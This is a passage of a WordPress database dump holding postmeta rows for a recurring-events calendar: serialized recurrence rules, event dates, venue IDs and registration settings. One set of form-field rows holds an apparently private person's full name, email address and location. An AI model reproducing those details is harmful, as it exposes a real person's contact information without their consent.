:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(124678,263325,'_EventEndDate','2021-02-08 20:30:00'),(125354,263324,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(129872,263590,'_EventCurrencySymbol',''),(129873,263590,'_EventCurrencyPosition','prefix'),(129874,263590,'_EventCost',''),(129875,263590,'_EventURL',''),(129876,263590,'_EventTimezone','America/Denver'),(129877,263590,'_dp_original','263319'),(129878,263590,'_EventVenueID','263589'),(129867,263590,'_RTECmaxRegistrations','30'),(129868,263590,'boldgrid_hide_page_title','0'),(129869,263590,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(124676,263325,'_EventStartDate','2021-02-08 19:00:00'),(124677,263325,'_EventStartDateUTC','2021-02-09 02:00:00'),(130062,263622,'_EventEndDateUTC','2021-03-17 01:00:00'),(130063,263622,'_EventDuration','3600'),(124942,263333,'_EventEndDate','2021-10-11 20:30:00'),(101147,128132,'_RTECregistrationsDisabled','1'),(101148,128132,'_RTECdeadlineType','start'),(101149,128132,'_RTECwhoCanRegister','any'),(101150,128132,'_RTEClimitRegistrations','0'),(101151,128132,'_RTECmaxRegistrations','30'),(94437,79666,'passster_activate_protection',NULL),(94438,79666,'passster_protection_type','password'),(143511,265134,'mec_additional_organizer_ids','a:0:{}'),(143510,265134,'mec_currency','a:0:{}'),(94477,261784,'_field_227','WA'),(94478,261784,'_field_228','US'),(94474,261784,'_field_224','Diane'),(94475,261784,'_field_225','Haddenham'),(94476,261784,'_field_226','264haddenh@fmail.com'),(119037,262961,'_EventOrigin','events-calendar'),(119045,262961,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119046,262961,'_EventShowMapLink','1'),(119047,262961,'_EventShowMap','1'),(119048,262961,'_EventVenueID','262507'),(119049,262961,'_EventCurrencySymbol',''),(119050,262961,'_EventCurrencyPosition','prefix'),(119051,262961,'_EventCost',''),(119052,262961,'_EventURL',''),(119053,262961,'_EventTimezone','America/Denver'),(119054,262961,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119101,262963,'_RTEClimitRegistrations','0'),(119064,262962,'protect_children',''),(119103,262963,'boldgrid_hide_page_title','0'),(119058,262962,'_EventStartDate','2021-10-10 09:00:00'),(119102,262963,'_RTECmaxRegistrations','30'),(119059,262962,'_EventStartDateUTC','2021-10-10 15:00:00'),(119060,262962,'_EventEndDate','2021-10-10 10:15:00'),(119061,262962,'_EventEndDateUTC','2021-10-10 16:15:00'),(119062,262962,'_EventDuration','4500'),(119063,262962,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(119065,262962,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(119068,262962,'_RTECregistrationsDisabled','1'),(119069,262962,'_RTECdeadlineType','start'),(119070,262962,'_RTECwhoCanRegister','any'),(119071,262962,'_RTEClimitRegistrations','0'),(119072,262962,'_RTECmaxRegistrations','30'),(119073,262962,'boldgrid_hide_page_title','0'),(119066,262962,'_EventOrigin','events-calendar'),(119074,262962,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119075,262962,'_EventShowMapLink','1'),(119076,262962,'_EventShowMap','1'),(119077,262962,'_EventVenueID','262507'),(119078,262962,'_EventCurrencySymbol',''),(119079,262962,'_EventCurrencyPosition','prefix'),(119080,262962,'_EventCost',''),(119081,262962,'_EventURL',''),(119082,262962,'_EventTimezone','America/Denver'),(119083,262962,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119104,262963,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119094,262963,'protect_children',''),(119088,262963,'_EventStartDate','2021-01-17 09:00:00'),(119089,262963,'_EventStartDateUTC','2021-01-17 16:00:00'),(119090,262963,'_EventEndDate','2021-01-17 10:15:00'),(119091,262963,'_EventEndDateUTC','2021-01-17 17:15:00'),(119095,262963,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119092,262963,'_EventDuration','4500'),(119093,262963,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(116718,262869,'_EventVenueID','262507'),(116719,262869,'_EventStartDate','2020-12-06 11:30:00'),(116715,262869,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(121050,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121070,263203,'_EventShowMapLink',''),(121079,263203,'_EventCost',''),(115626,262825,'protect_children',''),(115627,262825,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115634,262825,'_RTECmaxRegistrations','30'),(115625,262825,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(151818,266081,'mec_public','1'),(115630,262825,'_RTECregistrationsDisabled','1'),(115631,262825,'_RTECdeadlineType','start'),(115632,262825,'_RTECwhoCanRegister','any'),(115633,262825,'_RTEClimitRegistrations','0'),(115628,262825,'_EventOrigin','events-calendar'),(115635,262825,'boldgrid_hide_page_title','0'),(115636,262825,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115637,262825,'_EventShowMapLink','1'),(115638,262825,'_EventShowMap','1'),(115639,262825,'_EventVenueID','262507'),(115640,262825,'_EventCurrencySymbol',''),(115641,262825,'_EventCurrencyPosition','prefix'),(115642,262825,'_EventCost',''),(115643,262825,'_EventURL',''),(115644,262825,'_EventTimezone','America/Denver'),(115645,262825,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118404,262861,'protect_children',''),(118405,262861,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(116700,262869,'_RTECmaxRegistrations','30'),(116701,262869,'boldgrid_hide_page_title','0'),(116698,262869,'_RTECwhoCanRegister','any'),(116697,262869,'_RTECdeadlineType','start'),(116484,262862,'_EventStartDate','2021-04-04 09:00:00'),(116485,262862,'_EventStartDateUTC','2021-04-04 15:00:00'),(116486,262862,'_EventEndDate','2021-04-04 10:15:00'),(116487,262862,'_EventEndDateUTC','2021-04-04 16:15:00'),(116699,262869,'_RTEClimitRegistrations','0'),(116488,262862,'_EventDuration','4500'),(118843,262954,'_EventShowMapLink','1'),(118445,262863,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118429,262862,'_RTECregistrationsDisabled','1'),(118430,262862,'_RTECdeadlineType','start'),(118431,262862,'_RTECwhoCanRegister','any'),(118432,262862,'_RTEClimitRegistrations','0'),(118433,262862,'_RTECmaxRegistrations','30'),(118427,262862,'_EventOrigin','events-calendar'),(118434,262862,'boldgrid_hide_page_title','0'),(118435,262862,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118436,262862,'_EventShowMapLink','1'),(118437,262862,'_EventShowMap','1'),(118438,262862,'_EventVenueID','262507'),(118439,262862,'_EventCurrencySymbol',''),(118440,262862,'_EventCurrencyPosition','prefix'),(118441,262862,'_EventCost',''),(118442,262862,'_EventURL',''),(118443,262862,'_EventTimezone','America/Denver'),(118444,262862,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118425,262862,'protect_children',''),(118426,262862,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(116514,262863,'_EventStartDate','2021-05-02 09:00:00'),(116515,262863,'_EventStartDateUTC','2021-05-02 15:00:00'),(116516,262863,'_EventEndDate','2021-05-02 10:15:00'),(118551,262868,'protect_children',''),(116517,262863,'_EventEndDateUTC','2021-05-02 16:15:00'),(118552,262868,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513660;s:12:\"_EventOrigin\";i:1607513660;s:13:\"_thumbnail_id\";i:1607513660;s:26:\"_RTECregistrationsDisabled\";i:1607513660;s:17:\"_RTECdeadlineType\";i:1607513660;s:19:\"_RTECwhoCanRegister\";i:1607513660;s:23:\"_RTEClimitRegistrations\";i:1607513660;s:21:\"_RTECmaxRegistrations\";i:1607513660;s:24:\"boldgrid_hide_page_title\";i:1607513660;s:16:\"_EventRecurrence\";i:1607513660;s:17:\"_EventShowMapLink\";i:1607513660;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(116518,262863,'_EventDuration','4500'),(118464,262863,'_EventTimezone','America/Denver'),(118465,262863,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118466,262864,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;